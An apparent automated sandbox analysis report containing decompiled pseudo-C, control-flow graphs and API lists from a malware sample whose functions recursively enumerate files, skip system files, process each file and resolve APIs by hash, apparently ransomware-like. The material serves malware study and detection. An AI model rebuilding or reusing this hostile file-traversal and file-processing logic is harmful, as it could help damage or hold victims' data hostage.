                  0x00000000
                  0x00000000
                  0x00d0c288
                  0x00d0c289
                  0x00d0c28e
                  0x00d0c2a0
                  0x00d0c2a6
                  0x00d0c2ad
                  0x00d0c2c1
                  0x00d0c2c2
                  0x00d0c2c5
                  0x00d0c2d7
                  0x00d0c2dd
                  0x00d0c2e4
                  0x00d0c2f8
                  0x00d0c2f9
                  0x00d0c2fc
                  0x00d0c2fe
                  0x00d0c310
                  0x00d0c316
                  0x00d0c31d
                  0x00d0c331
                  0x00d0c334
                  0x00d0c337
                  0x00d0c33e
                  0x00000000
                  0x00d0c344
                  0x00000000
                  0x00d0c31f
                  0x00d0c32e
                  0x00d0c32e
                  0x00d0c2e6
                  0x00d0c2f5
                  0x00d0c2f5
                  0x00d0c2af
                  0x00d0c2be
                  0x00d0c2be
                  0x00000000
                  0x00d0c2ad
                  0x00d0c279
                  0x00d0c285
                  0x00000000
                  0x00d0c285
                  0x00d0c238
                  0x00000000

                  APIs
                  • CreateFileW.KERNELBASE(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,?,00000000), ref: 00D0C206
                  • WriteFile.KERNELBASE(000000FF,?,00000001,00000000,00000000,00D26000,?,?,?,00000000), ref: 00D0C267
                  • NtClose.NTDLL(000000FF,?,?,00000000), ref: 00D0C279
                  • WriteFile.KERNELBASE(000000FF,?,00000001,00000000,00000000,?,?,00000000), ref: 00D0C2A0
                  Memory Dump Source
                  • Source File: 00000000.00000002.519889486.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                  • Associated: 00000000.00000002.519778542.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520073523.0000000000D1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520095352.0000000000D1B000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520253617.0000000000D24000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520309834.0000000000D26000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520349173.0000000000D29000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$Write$CloseCreate
                  • String ID:
                  • API String ID: 237505210-0
                  • Opcode ID: 6a00efcfb94939bdfe23b6af12d3aa6d4d4d012070edcf492787893d61d665a8
                  • Instruction ID: e27b59614997ad33c1d918abbe1e53113e5e801740654af78c20f9e638288bc0
                  • Opcode Fuzzy Hash: 6a00efcfb94939bdfe23b6af12d3aa6d4d4d012070edcf492787893d61d665a8
                  • Instruction Fuzzy Hash: F8413C31A0020CEFDB10DBD4EC45BEEFB7AEB54322F5041A6E604E2291D3715A55DBA5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00D0763C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119fileCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 308 d0763c-d07663 310 d077f2-d077f7 308->310 311 d07669-d0767d call d06830 308->311 314 d07683-d076d0 call d016d0 FindFirstFileExW 311->314 315 d077d6-d077da 311->315 314->315 325 d076d6-d076df 314->325 316 d077e4-d077e8 315->316 317 d077dc-d077df call d0684c 315->317 316->310 319 d077ea-d077ed call d0684c 316->319 317->316 319->310 326 d077b5-d077c7 FindNextFileW 325->326 327 d076e5-d076eb 325->327 326->325 329 d077cd-d077d0 FindClose 326->329 327->326 328 d076f1-d0771f call d06830 327->328 328->326 334 d07725-d07761 GetFileAttributesW 328->334 329->315 338 d07763-d0776e 334->338 339 d0779e-d077a1 call d06654 334->339 344 d07770 338->344 345 d07772-d0777d 338->345 341 d077a6-d077ae call d0684c 339->341 341->326 349 d0778d-d0779c call d0684c 344->349 346 d07789 345->346 347 d0777f-d0778b call d0763c 345->347 346->349 347->338 349->326
                  C-Code - Quality: 46%
                  			E00D0763C(union _LARGE_INTEGER* __edx, intOrPtr _a4) {
				void* _v8;
				char _v12;
				WCHAR* _v16;
				WCHAR* _v20;
				struct _WIN32_FIND_DATAW _v612;
				int _t45;
				int _t54;
				void* _t55;
				void* _t56;
				void* _t60;
				signed int _t62;
				intOrPtr* _t68;
				union _LARGE_INTEGER* _t70;
				void* _t73;
				void* _t74;
				void* _t76;

				_t70 = __edx;
				_v16 = 0;
				_v20 = 0;
				_t45 =  *0xd2543c(_a4);
				_t74 = _t73 + 4;
				if(_t45 != 0) {
					_t45 = E00D06830(6 + _t45 * 2);
					_v16 = _t45;
					if(_v16 != 0) {
						 *0xd25444(_v16, _a4);
						E00D016D0(_v16);
						_v12 = 0x2a;
						 *0xd25440(_v16,  &_v12);
						_t76 = _t74 + 0x10;
						_t45 = FindFirstFileExW(_v16, 0,  &_v612, 0, 0, 0); // executed
						_v8 = _t45;
						if(_v8 != 0xffffffff) {
							do {
								_t68 =  &(_v612.cFileName);
								if( *_t68 != 0x2e &&  *_t68 != 0x2e002e) {
									_t55 =  *0xd2543c(_t68);
									_t56 =  *0xd2543c(_v16);
									_t76 = _t76 + 8;
									_v20 = E00D06830(2 + (_t55 + _t56) * 2);
									if(_v20 != 0) {
										 *0xd25444(_v20, _v16);
										_t60 =  *0xd25450(_v20, 0x2a);
										 *0xd25444(_t60,  &(_v612.cFileName));
										_t76 = _t76 + 0x18;
										_t62 = GetFileAttributesW(_v20); // executed
										if((_t62 & 0x00000010) == 0) {
											E00D06654(_t70, _v20); // executed
											E00D0684C(_v20);
											_v20 = 0;
										} else {
											while(1) {
												_push(_v20);
												if( *0xd25578() != 0) {
													break;
												}
												if( *[fs:0x34] == 0x91) {
													E00D0763C(_t70, _v20);
													continue;
												}
												L13:
												E00D0684C(_v20);
												_v20 = 0;
												goto L15;
											}
											goto L13;
										}
									}
								}
								L15:
								_t54 = FindNextFileW(_v8,  &_v612); // executed
							} while (_t54 != 0);
							_t45 = FindClose(_v8); // executed
						}
					}
					if(_v16 != 0) {
						_t45 = E00D0684C(_v16);
					}
					if(_v20 != 0) {
						return E00D0684C(_v20);
					}
				}
				return _t45;
			}



















                  0x00d0763c
                  0x00d07647
                  0x00d0764e
                  0x00d07658
                  0x00d0765e
                  0x00d07663
                  0x00d07671
                  0x00d07676
                  0x00d0767d
                  0x00d07689
                  0x00d07695
                  0x00d0769a
                  0x00d076a8
                  0x00d076ae
                  0x00d076c3
                  0x00d076c9
                  0x00d076d0
                  0x00d076d6
                  0x00d076d6
                  0x00d076df
                  0x00d076f2
                  0x00d07700
                  0x00d07706
                  0x00d07718
                  0x00d0771f
                  0x00d0772b
                  0x00d07739
                  0x00d0774a
                  0x00d07750
                  0x00d07756
                  0x00d07761
                  0x00d077a1
                  0x00d077a9
                  0x00d077ae
                  0x00d07763
                  0x00d07763
                  0x00d07763
                  0x00d0776e
                  0x00000000
                  0x00000000
                  0x00d0777d
                  0x00d07782
                  0x00000000
                  0x00d0778b
                  0x00d0778d
                  0x00d07790
                  0x00d07795
                  0x00000000
                  0x00d07795
                  0x00000000
                  0x00d07770
                  0x00d07761
                  0x00d0771f
                  0x00d077b5
                  0x00d077bf
                  0x00d077c5
                  0x00d077d0
                  0x00d077d0
                  0x00d076d0
                  0x00d077da
                  0x00d077df
                  0x00d077df
                  0x00d077e8
                  0x00000000
                  0x00d077ed
                  0x00d077e8
                  0x00d077f7

                  APIs
                    • Part of subcall function 00D06830: RtlAllocateHeap.NTDLL(?,00000008,00000000,?,00D176B5,?,00000000,00000000), ref: 00D06841
                  • FindFirstFileExW.KERNELBASE(00000000,00000000,?,00000000,00000000,00000000), ref: 00D076C3
                  • GetFileAttributesW.KERNELBASE(00000000), ref: 00D07756
                  • FindNextFileW.KERNELBASE(000000FF,?), ref: 00D077BF
                  • FindClose.KERNELBASE(000000FF), ref: 00D077D0
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.519889486.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                  • Associated: 00000000.00000002.519778542.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520073523.0000000000D1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520095352.0000000000D1B000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520253617.0000000000D24000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520309834.0000000000D26000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520349173.0000000000D29000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: FileFind$AllocateAttributesCloseFirstHeapNext
                  • String ID: *
                  • API String ID: 2580701565-163128923
                  • Opcode ID: 227a76152c77b0fbb0add9e98b159595e8c65b9c2a1146a5e52fd6cfc29da76c
                  • Instruction ID: 1f67724847fcea71f0f38f3e6ff62a3691edb8681445b10ce029e301ec846217
                  • Opcode Fuzzy Hash: 227a76152c77b0fbb0add9e98b159595e8c65b9c2a1146a5e52fd6cfc29da76c
                  • Instruction Fuzzy Hash: 6E418C70C04218EBDF21AFA0EC49BAEBB79FF00346F444160E419A91E1E7766A65DF71
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00D0DDD4 Relevance: 7.8, APIs: 5, Instructions: 256filethreadCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 355 d0ddd4-d0dde5 SetThreadPriority 356 d0ddeb-d0de0a 355->356 358 d0de3a-d0de3c 356->358 359 d0de0c-d0de14 356->359 361 d0de42-d0de47 358->361 362 d0de3e-d0de41 358->362 359->358 360 d0de16 359->360 363 d0de1d-d0de32 360->363 364 d0defc-d0deff 361->364 365 d0de4d-d0de7f ReadFile 361->365 379 d0de34-d0de38 363->379 380 d0de36 363->380 366 d0df05-d0df4a call d020bc 364->366 367 d0dffd-d0e000 364->367 368 d0de81-d0de8c 365->368 369 d0def2 365->369 409 d0df63-d0df6b 366->409 410 d0df4c-d0df61 366->410 372 d0e006-d0e045 WriteFile 367->372 373 d0e08d-d0e090 367->373 368->369 370 d0de8e-d0de96 368->370 374 d0e0dc-d0e0fb 369->374 376 d0deb4-d0dedb 370->376 377 d0de98-d0deb2 370->377 381 d0e047-d0e052 372->381 382 d0e089 372->382 373->374 378 d0e092-d0e096 373->378 393 d0e0fd 374->393 394 d0e0ff-d0e107 374->394 411 d0dedd-d0dee8 376->411 412 d0deee 376->412 377->369 384 d0e098-d0e09e 378->384 385 d0e0ac-d0e0ca NtClose call d01094 call d0684c 378->385 379->356 380->363 381->382 388 d0e054-d0e072 381->388 382->374 391 d0e0a0 384->391 392 d0e0a2-d0e0aa 384->392 413 d0e0cf-d0e0da 385->413 421 d0e074-d0e07f 388->421 422 d0e085 388->422 391->385 392->384 399 d0e12f-d0e131 393->399 397 d0e109 394->397 398 d0e12d 394->398 402 d0e110-d0e125 397->402 398->374 398->399 404 d0e133-d0e136 399->404 405 d0e137 399->405 423 d0e127-d0e12b 402->423 424 d0e129 402->424 405->361 417 d0df7a-d0df86 409->417 418 d0df6d-d0df6f 409->418 416 d0df8d-d0dfa9 WriteFile 410->416 419 d0deea 411->419 420 d0deec 411->420 412->369 413->374 431 d0e13c 413->431 426 d0dff3 416->426 427 d0dfab-d0dfb6 416->427 417->416 418->417 425 d0df71-d0df78 418->425 419->369 420->376 429 d0e081 421->429 430 d0e083 421->430 422->382 423->374 424->402 425->416 426->374 427->426 433 d0dfb8-d0dfdc 427->433 429->382 430->388 431->356 436 d0dfde-d0dfe9 433->436 437 d0dfef 433->437 438 d0dfeb 436->438 439 d0dfed 436->439 437->426 438->426 439->433
                  APIs
                  • SetThreadPriority.KERNELBASE(000000FE,00000002), ref: 00D0DDE5
                  • ReadFile.KERNELBASE(?,?,?,?,?), ref: 00D0DE77
                  Memory Dump Source
                  • Source File: 00000000.00000002.519889486.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                  • Associated: 00000000.00000002.519778542.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520073523.0000000000D1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520095352.0000000000D1B000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520253617.0000000000D24000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520309834.0000000000D26000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520349173.0000000000D29000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: FilePriorityReadThread
                  • String ID:
                  • API String ID: 3643687941-0
                  • Opcode ID: ff0ee0b982d2f4a94fd13aaf14671ba8362441080fec8f4a7948cefa6575be7e
                  • Instruction ID: b566fb181fcb1bc1ec4c68a7cebf1438463a5e5bfa706904bbdf14a81d9bb6cc
                  • Opcode Fuzzy Hash: ff0ee0b982d2f4a94fd13aaf14671ba8362441080fec8f4a7948cefa6575be7e
                  • Instruction Fuzzy Hash: 35A17871500605EFDF218F90DC88FAA7BBDEB14314F2442A2E94AC91D9D7B0DA44CB72
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00D0F264 Relevance: 7.7, APIs: 5, Instructions: 175filethreadCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 440 d0f264-d0f27b GetFileAttributesW 441 d0f2db-d0f2ed SetThreadPriority call d01574 440->441 442 d0f27d-d0f289 call d0bb50 440->442 449 d0f2f8 441->449 450 d0f2ef-d0f2f6 441->450 447 d0f28b-d0f299 call d0a064 442->447 448 d0f2cd-d0f2d8 call d0684c 442->448 447->448 457 d0f29b-d0f29f 447->457 453 d0f2ff-d0f312 call d06830 449->453 450->453 461 d0f319-d0f359 call d0c0f8 call d0f0c0 call d0684c FindFirstFileExW 453->461 459 d0f2a1-d0f2a5 457->459 460 d0f2a7-d0f2ca call d0c0f8 call d07260 call d0eec8 457->460 459->448 459->460 474 d0f491-d0f4a6 call d0684c 461->474 475 d0f35f-d0f36d 461->475 479 d0f4a8-d0f4c6 call d0684c 474->479 480 d0f4aa-d0f4be 474->480 481 d0f372-d0f37b 475->481 489 d0f4cb-d0f4ce 479->489 480->461 483 d0f385 481->483 484 d0f37d-d0f383 481->484 487 d0f470-d0f482 FindNextFileW 483->487 484->483 486 d0f38a-d0f394 484->486 490 d0f396 486->490 491 d0f39b-d0f3a2 486->491 487->481 488 d0f488-d0f48b FindClose 487->488 488->474 490->487 492 d0f3a4-d0f3a8 491->492 493 d0f3af-d0f3b3 491->493 492->493 496 d0f3aa 492->496 494 d0f3b5-d0f3bd call d0f210 493->494 495 d0f3dd-d0f3e5 call d0f178 493->495 501 d0f3d8 494->501 502 d0f3bf-d0f3d6 call d0f124 494->502 503 d0f3e7 495->503 504 d0f3ec-d0f3f3 495->504 496->487 501->487 502->501 503->487 506 d0f400-d0f40a call d0bb50 504->506 507 d0f3f5-d0f3fc 504->507 512 d0f40c 506->512 513 d0f40e-d0f42c call d0f124 call d07260 call d0eec8 506->513 507->506 510 d0f3fe 507->510 510->487 512->487 519 d0f431-d0f438 513->519 519->487 520 d0f43a-d0f43c 519->520 521 d0f465 520->521 522 d0f43e-d0f463 520->522 521->487 522->487
                  C-Code - Quality: 82%
                  			E00D0F264(WCHAR* _a4) {
				void* _v8;
				long _v12;
				signed int _v16;
				WCHAR* _v20;
				WCHAR* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				struct _WIN32_FIND_DATAW _v628;
				signed int _t66;
				intOrPtr _t69;
				WCHAR* _t72;
				void* _t75;
				signed int _t77;
				void* _t78;
				short* _t79;
				int _t81;
				signed short _t82;
				void* _t87;
				intOrPtr _t92;
				intOrPtr* _t103;
				void* _t110;

				_t66 = GetFileAttributesW(_a4); // executed
				if((_t66 & 0x00000010) != 0) {
					SetThreadPriority(0xfffffffe, 2); // executed
					if(E00D01574() <= 0x3c) {
						_v12 = 0;
					} else {
						_v12 = 2;
					}
					_t69 = E00D06830(0x3d0900); // executed
					_v28 = _t69;
					_t70 = _a4;
					_v24 = _a4;
					_v16 = 0xffffffff;
					while(1) {
						E00D0C0F8(_t70, _v24, 0xd25180); // executed
						_t72 = E00D0F0C0(_v24); // executed
						_v20 = _t72;
						E00D0684C(_v24);
						_t75 = FindFirstFileExW(_v20, 0,  &_v628, 0, 0, _v12); // executed
						_v8 = _t75;
						if(_v8 == 0xffffffff) {
							goto L38;
						} else {
							_t79 =  *0xd25450(_v20, 0x2a);
							_t110 = _t110 + 8;
							 *_t79 = 0;
							goto L13;
						}
						do {
							L13:
							_t103 =  &(_v628.cFileName);
							if( *_t103 != 0x2e &&  *_t103 != 0x2e002e) {
								_t82 = _v628.dwFileAttributes;
								if((_t82 & 0x00000004) == 0) {
									if( *0xd25123 == 0 || (_t82 & 0x00000002) == 0) {
										if((_t82 & 0x00000010) == 0) {
											if(E00D0F178(_t103) == 0) {
												if(_v628.nFileSizeHigh != 0 || _v628.nFileSizeLow != 0) {
													if(E00D0BB50(_t103, 0) == 0) {
														E00D07260(E00D0F124(_v20, _t103)); // executed
														_t87 = E00D0EEC8(_t85, _v628.nFileSizeLow, _v628.nFileSizeHigh); // executed
														if( *0xd2512d != 0) {
															if(_t87 == 0) {
																 *0xd2555c(0xd25190);
															} else {
																 *0xd2555c(0xd25184);
																asm("lock add [0xd25188], eax");
																asm("lock adc [0xd2518c], edx");
															}
														}
													}
												}
											}
										} else {
											if(E00D0F210(_t103) == 0) {
												_t92 = E00D0F124(_v20, _t103);
												_v16 = _v16 + 1;
												 *((intOrPtr*)(_v28 + _v16 * 4)) = _t92;
											}
										}
									}
								}
							}
							_t81 = FindNextFileW(_v8,  &_v628); // executed
						} while (_t81 != 0);
						FindClose(_v8); // executed
						L38:
						E00D0684C(_v20); // executed
						_v20 = 0;
						_t77 = _v16;
						if(_t77 != 0xffffffff) {
							_t70 = _v28 + _t77 * 4;
							 *_t70 = 0;
							_v24 =  *_t70;
							_v16 = _v16 - 1;
							continue;
						}
						_t78 = E00D0684C(_v28); // executed
						return _t78;
						goto L42;
					}
				} else {
					if(E00D0BB50(_a4, 1) != 0 || E00D0A064(_a4,  &_v36) == 0 || _v32 == 0 && _v36 == 0) {
						return E00D0684C(_a4);
					} else {
						E00D0C0F8(_t99, _a4, 0);
						E00D07260(_a4);
						return E00D0EEC8(_a4, _v36, _v32);
					}
				}
				L42:
			}

























                  0x00d0f270
                  0x00d0f27b
                  0x00d0f2df
                  0x00d0f2ed
                  0x00d0f2f8
                  0x00d0f2ef
                  0x00d0f2ef
                  0x00d0f2ef
                  0x00d0f304
                  0x00d0f309
                  0x00d0f30c
                  0x00d0f30f
                  0x00d0f312
                  0x00d0f319
                  0x00d0f321
                  0x00d0f329
                  0x00d0f32e
                  0x00d0f334
                  0x00d0f34c
                  0x00d0f352
                  0x00d0f359
                  0x00000000
                  0x00d0f35f
                  0x00d0f364
                  0x00d0f36a
                  0x00d0f36d
                  0x00d0f36d
                  0x00d0f36d
                  0x00d0f372
                  0x00d0f372
                  0x00d0f372
                  0x00d0f37b
                  0x00d0f38a
                  0x00d0f394
                  0x00d0f3a2
                  0x00d0f3b3
                  0x00d0f3e5
                  0x00d0f3f3
                  0x00d0f40a
                  0x00d0f41a
                  0x00d0f42c
                  0x00d0f438
                  0x00d0f43c
                  0x00d0f46a
                  0x00d0f43e
                  0x00d0f443
                  0x00d0f455
                  0x00d0f45c
                  0x00d0f45c
                  0x00d0f43c
                  0x00d0f438
                  0x00d0f40a
                  0x00d0f3f3
                  0x00d0f3b5
                  0x00d0f3bd
                  0x00d0f3c3
                  0x00d0f3ca
                  0x00d0f3d6
                  0x00d0f3d6
                  0x00d0f3d8
                  0x00d0f3b3
                  0x00d0f3a2
                  0x00d0f394
                  0x00d0f47a
                  0x00d0f480
                  0x00d0f48b
                  0x00d0f491
                  0x00d0f494
                  0x00d0f499
                  0x00d0f4a0
                  0x00d0f4a6
                  0x00d0f4ad
                  0x00d0f4b2
                  0x00d0f4b8
                  0x00d0f4bb
                  0x00000000
                  0x00d0f4bb
                  0x00d0f4c6
                  0x00d0f4ce
                  0x00000000
                  0x00d0f4ce
                  0x00d0f27d
                  0x00d0f289
                  0x00d0f2d8
                  0x00d0f2a7
                  0x00d0f2ac
                  0x00d0f2b4
                  0x00d0f2ca
                  0x00d0f2ca
                  0x00d0f289
                  0x00000000

                  APIs
                  • GetFileAttributesW.KERNELBASE(?), ref: 00D0F270
                  • SetThreadPriority.KERNELBASE(000000FE,00000002), ref: 00D0F2DF
                  • FindFirstFileExW.KERNELBASE(?,00000000,?,00000000,00000000,00000000,?,?,?,00D25180,003D0900), ref: 00D0F34C
                  • FindNextFileW.KERNELBASE(000000FF,?), ref: 00D0F47A
                  • FindClose.KERNELBASE(000000FF), ref: 00D0F48B
                    • Part of subcall function 00D0A064: FindFirstFileExW.KERNELBASE(?,00000000,?,00000000,00000000,00000000), ref: 00D0A086
                    • Part of subcall function 00D0A064: FindClose.KERNELBASE(000000FF), ref: 00D0A0AC
                  Memory Dump Source
                  • Source File: 00000000.00000002.519889486.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                  • Associated: 00000000.00000002.519778542.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520073523.0000000000D1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520095352.0000000000D1B000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520253617.0000000000D24000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520309834.0000000000D26000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520349173.0000000000D29000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirst$AttributesNextPriorityThread
                  • String ID:
                  • API String ID: 3755735135-0
                  • Opcode ID: 810a8779b16718ddbe9745ca239e1b1f8810aa97d009b58e3dd672bdfce99b22
                  • Instruction ID: 6c3876b7b212156779a62924bc8d51b894b308a25d0addc9e23290387a14939f
                  • Opcode Fuzzy Hash: 810a8779b16718ddbe9745ca239e1b1f8810aa97d009b58e3dd672bdfce99b22
                  • Instruction Fuzzy Hash: F9618730800309EBDF31AFA0DC49BAEBB75EF14314F244176E848A66E1D7719A92DB75
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00D05C34 Relevance: 6.1, APIs: 4, Instructions: 99fileCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 576 d05c34-d05c45 577 d05c66-d05c6d 576->577 578 d05c47-d05c61 call d05afc 576->578 580 d05c8e-d05c95 577->580 581 d05c6f-d05c89 call d05afc 577->581 578->577 584 d05cb6-d05cbd call d01668 580->584 585 d05c97-d05cb1 call d05afc 580->585 581->580 590 d05cc2-d05cc6 584->590 585->584 591 d05cc8-d05cf2 call d01250 590->591 592 d05ced-d05cf0 590->592 596 d05cf9-d05d14 FindFirstFileW 591->596 592->590 597 d05d64-d05d68 596->597 598 d05d16-d05d27 call d011d4 596->598 599 d05d6a-d05dac 597->599 600 d05d6c-d05d76 597->600 608 d05d47-d05d59 FindNextFileW 598->608 609 d05d29-d05d3b FindClose call d05a30 598->609 603 d05d78-d05d7d 600->603 604 d05d9b-d05d9e 600->604 606 d05d96-d05d99 603->606 607 d05d7f-d05d94 call d01250 603->607 604->596 606->603 607->604 608->598 610 d05d5b-d05d5e FindClose 608->610 614 d05d40-d05d44 609->614 610->597
                  C-Code - Quality: 100%
                  			E00D05C34(intOrPtr _a4) {
				intOrPtr _v8;
				void* _v12;
				struct _WIN32_FIND_DATAW _v604;
				short _v732;
				void* _t25;
				void* _t29;
				int _t35;
				void* _t38;
				intOrPtr* _t45;
				intOrPtr* _t46;

				if( *0xd25400 == 0) {
					 *0xd25400 = 0xffffffffda1aaea2;
					 *0xd25400 = E00D05AFC( *0xd25400);
				}
				if( *0xd25404 == 0) {
					 *0xd25404 = 0x576ac9d5;
					 *0xd25404 = E00D05AFC( *0xd25404);
				}
				if( *0xd25408 == 0) {
					 *0xd25408 = 0x78403a7c;
					 *0xd25408 = E00D05AFC( *0xd25408);
				}
				_t45 =  &_v732;
				_t25 = E00D01668(_t24, _t45);
				while( *_t45 != 0) {
					_t45 = _t45 + 2;
				}
				 *_t45 = 0xb7d64064;
				 *((intOrPtr*)(_t45 + 4)) = 0xb7984016;
				 *((intOrPtr*)(_t45 + 8)) = 0xb7904054;
				 *((intOrPtr*)(_t45 + 0xc)) = 0xb7fc4038;
				E00D01250(_t25, _t45, 4);
				_v8 = 0;
				while(1) {
					_t29 = FindFirstFileW( &_v732,  &_v604); // executed
					_v12 = _t29;
					if(_v12 == 0xffffffff) {
						goto L16;
					}
					while(E00D011D4( &(_v604.cFileName), 0) != _a4) {
						_t35 = FindNextFileW(_v12,  &_v604); // executed
						if(_t35 != 0) {
							continue;
						} else {
							_t29 = FindClose(_v12); // executed
							goto L16;
						}
						L24:
					}
					FindClose(_v12); // executed
					_t38 = E00D05A30( &(_v604.cFileName), 1); // executed
					return _t38;
					goto L24;
					L16:
					if(_v8 == 0) {
						_t46 =  &_v732;
						if(_v8 == 0) {
							while( *((short*)(_t46 - 2)) != 0x2e) {
								_t46 = _t46 + 2;
							}
							 *_t46 = 0xb78e405c;
							 *((intOrPtr*)(_t46 + 4)) = 0xb7fc404e;
							E00D01250(_t29, _t46, 2);
						}
						_v8 = _v8 + 1;
						continue;
					} else {
						return 0;
					}
					goto L24;
				}
			}













                  0x00d05c45
                  0x00d05c51
                  0x00d05c61
                  0x00d05c61
                  0x00d05c6d
                  0x00d05c79
                  0x00d05c89
                  0x00d05c89
                  0x00d05c95
                  0x00d05ca1
                  0x00d05cb1
                  0x00d05cb1
                  0x00d05cb6
                  0x00d05cbd
                  0x00d05cc2
                  0x00d05ced
                  0x00d05ced
                  0x00d05cc8
                  0x00d05cce
                  0x00d05cd5
                  0x00d05cdc
                  0x00d05ce6
                  0x00d05cf2
                  0x00d05cf9
                  0x00d05d07
                  0x00d05d0d
                  0x00d05d14
                  0x00000000
                  0x00000000
                  0x00d05d16
                  0x00d05d51
                  0x00d05d59
                  0x00000000
                  0x00d05d5b
                  0x00d05d5e
                  0x00000000
                  0x00d05d5e
                  0x00000000
                  0x00d05d59
                  0x00d05d2c
                  0x00d05d3b
                  0x00d05d44
                  0x00000000
                  0x00d05d64
                  0x00d05d68
                  0x00d05d6c
                  0x00d05d76
                  0x00d05d78
                  0x00d05d96
                  0x00d05d96
                  0x00d05d7f
                  0x00d05d85
                  0x00d05d8f
                  0x00d05d8f
                  0x00d05d9b
                  0x00000000
                  0x00d05d6a
                  0x00d05dac
                  0x00d05dac
                  0x00000000
                  0x00d05d68

                  APIs
                  • FindFirstFileW.KERNELBASE(?,?,?,00000004,?), ref: 00D05D07
                  • FindClose.KERNELBASE(000000FF,?,00000000), ref: 00D05D2C
                  • FindNextFileW.KERNELBASE(000000FF,?,?,00000000), ref: 00D05D51
                  • FindClose.KERNELBASE(000000FF), ref: 00D05D5E
                  Memory Dump Source
                  • Source File: 00000000.00000002.519889486.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                  • Associated: 00000000.00000002.519778542.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520073523.0000000000D1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520095352.0000000000D1B000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520253617.0000000000D24000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520309834.0000000000D26000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520349173.0000000000D29000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$CloseFile$FirstNext
                  • String ID:
                  • API String ID: 1164774033-0
                  • Opcode ID: 3e106ec7d7df2e14848b6bb9a3919e9808d475376e67c60dc9ed1b33d5a738a8
                  • Instruction ID: aa5f0d0327e9388d3735007749f1e03327fd1b7e9f2844e9b2d8bf438c4daef9
                  • Opcode Fuzzy Hash: 3e106ec7d7df2e14848b6bb9a3919e9808d475376e67c60dc9ed1b33d5a738a8
                  • Instruction Fuzzy Hash: 24416470800B08EFDB20AF60FC89B5ABB74EB10315F548656E8099A2A9D77489C7CF34
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00D0B690 Relevance: 4.5, APIs: 3, Instructions: 31nativeCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00D0B690(void* __eflags) {
				void* _t1;
				void* _t9;

				_t1 = E00D06888(4);
				_t9 = _t1;
				if(_t9 != 0) {
					 *_t9 = 3;
					NtSetInformationProcess(0xffffffff, 0x21, _t9, 4); // executed
